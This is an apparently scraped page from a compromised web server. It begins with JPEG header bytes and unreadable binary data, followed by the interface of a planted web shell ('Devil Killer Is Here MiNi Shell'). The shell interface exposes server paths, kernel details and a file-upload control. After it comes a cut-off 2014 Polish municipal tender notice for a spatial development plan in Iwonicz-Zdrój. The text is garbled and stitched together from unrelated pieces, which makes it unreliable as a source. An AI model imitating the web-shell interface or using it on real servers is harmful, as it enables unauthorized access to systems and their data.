JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140704/144717-N-2014.html

<p class="kh_header"><b>Iwonicz-Zdrój: Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego Iwonicz1/2014 wraz z opracowaniem zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Iwonicz-Zdrój</b><br>
<b>Numer ogłoszenia: 144717 - 2014; data zamieszczenia: 04.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Iwonicz-Zdrój , Aleja Słoneczna 28, 38-440 Iwonicz-Zdrój, woj. podkarpackie, tel. 13 435-02-12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iwonicz-zdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego Iwonicz1/2014 wraz z opracowaniem zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Iwonicz-Zdrój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje  zadanie:
Sporządzenie projektu Miejscowego Planu Zagospodarowania Przestrzennego /Iwonicz 1/2014 /Sołectwa Iwonicz o pow. opracowania  340 ha   na podstawie uchwały Rady Miejskiej w Iwoniczu-Zdroju z dnia 09 maja 2014 roku Nr XLVII/321/2014 oraz z  częściową zmianą Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Iwonicz-Zdrój  na podstawie Uchwały podjętej przez Radę Miejską w Iwoniczu-Zdroju z dnia 09 maja 2014 roku Nr XLVII/322/2014 z wykorzystaniem zapisów uchwalonych  i obowiązujących siedmiu Miejscowych Planów Zagospodarowania Przestrzennego dla sołectwa Iwonicz: tj.: wraz z przygotowaniem dokumentów związanych z wymogami uzyskania zgody na zmianę przeznaczenia terenów na cele nierolnicze opracowany w skali 1:2000 w formacie dxf, pdf, jpg.
WARUNKI ZAMÓWIENIA

1. Zmiana  Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Iwonicz-Zdrój zatwierdzonego uchwałą Rady Miejskiej w Iwoniczu-Zdroju Nr XXIII/172/2012 z dnia 29.10.2012 roku oraz opracowanie Miejscowego planu zagospodarowania przestrzennego w granicach wskazanych na załącznikach graficznych Iwonicz 1/2014 do uchwał  winna być dostosowana do wymogów ustawy o planowaniu i zagospodarowaniu przestrzennym oraz jej przepisów wykonawczych oraz ustawy o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko.
2.  Projekt planu zagospodarowania przestrzennego Iwonicz 1/2014 winien być opracowany na mapie zasadniczej w skali 1 : 2000 -zakupionej  przez Wykonawcę na własny koszt.
3. Projekt zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego winien być opracowany   na mapie w skali 1 : 10 000 - zakupionej przez Wykonawcę na własny koszt.
4. Sporządzenie w/w Miejscowego Planu Iwonicz 1/2014 wraz ze zmianą Studium  obejmuje:
a/ przygotowanie tekstu uchwał wraz uzasadnieniem i podsumowaniem , rysunków, wzorów wszystkich pism, obwieszczeń i ogłoszeń, opinii i zawiadomień o wyłożeniu do publicznego wglądu, uzgodnień określonych w ustawie o planowaniu przestrzennym,
b/  inwentaryzację urbanistyczną -prace terenowe  
c/ sporządzenie projektu planów i zmiany studium wraz z prognozą oddziaływania na środowisko z uwzględnieniem ustaleń planu zagospodarowania przestrzennego Województwa Podkarpackiego.
d/  sporządzenie prognozy skutków finansowych, 
e/ uzyskanie od Komisji Urbanistyczno-Architektonicznej opinii o projekcie planu,
f/ sporządzenie rysunku planu oraz w skali 1 : 2000,
g/ prezentacja koncepcji planu oraz zmiany Studium wraz prognozą oddziaływania na środowiska władzom Gminy,
h/ wprowadzenie zmian wynikających z uzyskanych opinii i dokonanych uzgodnień,
i/ przygotowanie ogłoszeń i obwieszczeń o wyłożeniu projektu planu oraz studium  do publicznego wglądu wraz z prognozą oddziaływania na środowisko,
j/ udział w dyskusjach publicznych nad przyjętymi rozwiązaniami w projekcie zmiany planu oraz studium i w prognozie oddziaływania na środowisko, 
k/ analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu planu i studium oraz prognozy oddziaływania na środowisko,
l/ wprowadzenie zmiany do projektu planu i  studium  wynikających z rozpatrzenia ewentualnych uwag,
ł/ ewentualne ponowne uzgodnienie projektu  planu i studium w niezbędnym zakresie Burmistrzowi i Radzie Gminy Iwonicz-Zdrój.
5. Zamawiający wymaga aby kompletne i ostateczne opracowania projektu zmiany planu Iwonicz 1 /2014 składało się z:
1/ tekstu planu oraz zmiany Studium w formie uchwały Rady wraz z dokumentami formalno-prawnymi i materiałami związanymi ze sporządzeniem planu - po 4 egz. w wersji drukowanej + płyta CD,
2/ rysunku planu w skali 1 : 2000  oraz Studium w skali 1: 10 000 po 4 egz. w technice barwionej zabezpieczone przed zniszczeniem np. laminowane w 1 egz. + płyta CD w formacie dxf,PDF,
3/ rysunku, planu oraz zmiany Studium pomniejszone do publikacji na nośniku CD,
4/ rysunków  planu, oraz zmiany Studium w wersji umożliwiającej jego zamieszczenie na stronie internetowej Zamawiającego na nośniku CD- 1 sztuka,
5/ prognozy oddziaływania na środowisko przyrodnicze - 2 egz. + płyta CD,
6/ prognoza skutków finansowych - 2 egz. + płyta CD,
7/ kompletu oryginalnej dokumentacji formalno-prawnej wymaganej do legalizacji u Wojewody,
8/ Wykonawca przejmuje na siebie wszystkie obowiązki sporządzenia planu i zmiany Studium do czasu stwierdzenia przez Wojewodę ich zgodności z przepisami prawa.
6. Wykonawca bierze pełną odpowiedzialność prawną i zawodową za spełnienie wymogów przy sporządzaniu planu i zmiany studium określonych w przepisach prawa dotyczących w/w opracowań oraz innych ustaw. 
7. W przypadku zmiany przepisów dot. przedmiotu zamówienia, należy uwzględnić zasady i procedurę zgodnie z obowiązującymi przepisami prawa.
8. Z mocy zawartej umowy Wykonawca wraz z projektantami  /twórcami/ zobowiązuje się do przeniesienia na rzecz Zamawiającego własność praw autorskich dopracowania  stanowiącego utwory w rozumieniu przepisów ustawy z dnia 04.02.1994 roku o prawie autorskim i prawach pokrewnych/Dz.U. z 2006 roku, Nr 90.poz.631,ze zmianami/.
9. Przeniesienie własności praw autorskich do opracowania stanowiącego przedmiot umowy następuje bezwarunkowo, na czas nieokreślony w ramach wynagrodzenia wskazanego w niniejszej umowie.
10. Zamówienie obejmuje wykonanie materiałów geodezyjnych niezbędnych do   wykonania planu i studium oraz aktualizacji opracowania ekofizjogfraficznego wraz z prognozą oddziaływania na środowisko. 
11. Przedmiot zamówienia należy wykonać w wersji papierowej  oraz w wersji cyfrowej zgodnie z wytycznymi dyrektywy unijnej INSPIRE w formacie: dxf, pdf, jpg oraz część tekstowa wprowadzona do legislatora w formacie: ZIPX i PDF.
12. Podmiot wykonujący prace projektowe winien wykonać umowę zgodnie ze zleceniem Zamawiającego, zasadami sztuki architektoniczno- urbanistycznej, obowiązującymi w zakresie planowania przestrzennego przepisami prawa oraz normami.
13. Wykonany przedmiot zamówienia powinien posiadać niezbędne opinie i uzgodnienia, być wewnętrznie spójny i skoordynowany we wszystkich tematach.
14. Zakres projektu planu powinien zostać sporządzony w sposób zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r. Nr 164 poz. 1587).

UWAGA!! 
Przed podpisaniem umowy Wykonawca w porozumieniu z Zamawiającym przygotuje harmonogram terminowo rzeczowo finansowy. Zamawiający zastrzega sobie możliwość wprowadzenia zmian.  

Dokumenty planistyczne obejmujące zakres opracowania   znajdują się w załącznik nr 9.

3.4. Okres gwarancji udzielonej przez Wykonawcę na dostarczone materiały musi wynosić co najmniej 60 miesięcy od dnia odbioru materiałów. Ustala się okres rękojmi równy okresowi gwarancji..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość  udzielenia zamówień uzupełniających przewidzianych dla zamówienia podstawowego i dotyczących przedmiotu zamówienia w niej określonego, 
a stanowiących nie więcej niż  50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia, Zamawiający w oparciu o przepisy art. 67 ust. 1 pkt 6 ustawy Pzp, powierzy ich wykonanie w trybie zamówienia z wolnej ręki.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia, to znaczy Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeśli okres prowadzenia działalności jest krótszy, to w tym okresie) zrealizował z należytą starannością co najmniej jedno opracowanie planu zagospodarowania przestrzennego o powierzchni opracowania minimum 100 ha. Przez zrealizowany plan Zamawiający rozumie taką uchwałę, która została opublikowana w Dzienniku Urzędowym województwa i w stosunku do której nie zostało wydane rozstrzygnięcie nadzorcze.

W celu wykazania spełniania warunku wykonawca zobowiązany jest złożyć:
a) wykaz wykonanych/wykonywanych przez wykonawcę głównych usług określonych  powyżej w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia, z podaniem ich:
- przedmiotu,
- dat wykonania,
-podmiotów, na rzecz których usługi zostały wykonane.
b) dowody, że usługi główne wskazane w wykazie zostały/są wykonywane wykonane należycie. Przez usługi główne zamawiający rozumie wykazanie się ww. usługami w zakresie, wartości i ilości niezbędnej do spełnienia warunku udziału w postępowaniu. 
 
Dowodami, o których mowa powyżej są:
- poświadczenie;
Zgodnie z wytycznymi UZP /poprzez poświadczenie należy rozumieć dokument potwierdzający określone fakty lub wiedzę wystawcy, którego wystawcą nie jest wykonawca. Poświadczeniem będą zatem zarówno dokumenty wystawione przez podmiot, na rzecz którego usługi zostały wykonane, np. referencje, jak i dokumenty wystawione przez inny podmiot, który posiada kompetencje, by poświadczyć określone fakty/. 

W odniesieniu do nadal wykonywanych usług (ciągłych lub okresowych)  poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. 

- oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej;

W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w w/w wykazie zostały wcześniej wykonane - wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.

W przypadku składania oferty przez Wykonawców występujących wspólnie (konsorcjum, spółka cywilna) w/w warunek mogą oni spełnić łącznie.

Ocena spełniania tego warunku w postępowaniu odbywać się będzie na podstawie dokumentów  
i oświadczeń przedłożonych przez Wykonawcę, metodą warunku granicznego spełnia nie/spełnia. Oznacza to, że wystarczającym powodem do wykluczenia Wykonawcy może być brak 
w ofercie wymaganych oświadczeń i/lub dokumentów oraz ich nieuzupełnienie we wskazanym przez Zamawiającego terminie, w trybie art. 26 ust. 3 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował: 
co najmniej:
- jedną osobą, która posiada kwalifikacje do pełnienia funkcji głównego projektanta - urbanista zgodnie z wymaganiami ustawy z 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2013r., poz. 932 ze zm.). Zamawiający dopuszcza możliwość uznania uprawnień wynikających z innych niż krajowe przepisów, które potwierdzą spełnianie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia. 

W celu wykazania spełniania warunku Wykonawca zobowiązany jest:
a) złożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności,
b) złożyć oświadczenie stwierdzające, iż osoby wymienione w wykazie posiadają wymagane przez Zamawiającego uprawnienia,
c) podać informację o podstawie dysponowania osobami ujętymi w wykazie.

W przypadku składania oferty przez Wykonawców występujących wspólnie (konsorcjum, spółka cywilna) w/w warunek mogą oni spełnić łącznie.

Ocena spełniania tego warunku w postępowaniu odbywać się będzie na podstawie dokumentów  
i oświadczeń przedłożonych przez Wykonawcę, metodą warunku granicznego spełnia nie/spełnia. Oznacza to, że wystarczającym powodem do wykluczenia Wykonawcy może być brak 
w ofercie wymaganych oświadczeń i/lub dokumentów oraz ich nieuzupełnienie we wskazanym przez Zamawiającego terminie, w trybie art. 26 ust. 3 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta powinna zawierać:
- formularz oferty wykonania zamówienia, (załącznik nr 1),
- oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu,(załącznik nr 2),
- oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania, (załącznik nr 3),
- dokumenty i pozostałe oświadczenia wskazane w ust.  6 siwz,
- pisemne zobowiązanie - jeżeli dotyczy,
- stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie  wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru,
- informację, w formie oświadczenia o braku przynależności do grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, którego wzór stanowi załącznik nr 3a do SIWZ. W przypadku przynależności do grupy Wykonawca zamiast informacji składa listę podmiotów należących do tej samej grupy kapitałowej,
- w  przypadku Wykonawców  wspólnie  ubiegających  się  o  udzielenie zamówienia,   dokument  ustanawiający  Pełnomocnika  do   reprezentowania  ich   w postępowaniu o udzielenie zamówienia  albo  reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.2.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń: 
1) Terminu wykonania zamówienia w przypadku:
a)	konieczności powtórzenia prac lub czynności z przyczyn proceduralnych niezależnych od Wykonawcy,
b)	działania siły wyższej, za które uważa się zdarzenia o charakterze nadzwyczajnym, które wystąpią po zawarciu umowy, a których strony nie były w stanie przewidzieć 
w momencie jej zawarcia i których zaistnienie lub skutki uniemożliwiają wykonanie przedmiotu umowy w sposób należyty,
c)	konieczności wykonania zamówienia dodatkowego, które jest niezbędne dla prawidłowej  realizacji przedmiotu zamówienia, a którego nie można było przewidzieć na etapie składania oferty,
d)	rezygnacji z realizacji części zamówienia,
e)	czasowego wstrzymania prac przez zamawiającego,
f)	wystąpienia, w trakcie wykonywania umowy, zmian dotyczących warunków projektowania z powodu zmiany przepisów, norm lub normatywów mających zastosowanie do przedmiotu umowy, których strony umowy nie mogły przewidzieć w chwili jej zawierania,
g)	wystąpienia okoliczności zewnętrznych, niezależnych od Wykonawcy, które uniemożliwiają dotrzymanie terminu,
h)  przestojów i opóźnień zawinionych przez Zamawiającego; m.in. gdy Zamawiający opóźni dostarczenie materiałów niezbędnych do wykonania przedmiotu umowy,
i)   konieczności uzyskania aktualnych dokumentów niezbędnych do realizacji przedmiotu umowy,
j) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy.
2)  Wysokości wynagrodzenia wykonawcy w przypadku:
a)	gdy nastąpi zmiana wysokości stawki podatku VAT przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,
b)	odstąpienia przez Zamawiającego (rezygnacji) z części zamówienia.
3) Wszelkie zmiany które w istotny sposób zmienią treść umowy wymagają pisemnego aneksu podpisanego przez strony.
4)	Wszystkie powyższe postanowienia wymienione w niniejszym ustępie stanowią katalog  zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.iwonicz-zdroj.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Iwoniczu-Zdroju;
Al. Słoneczna 28;
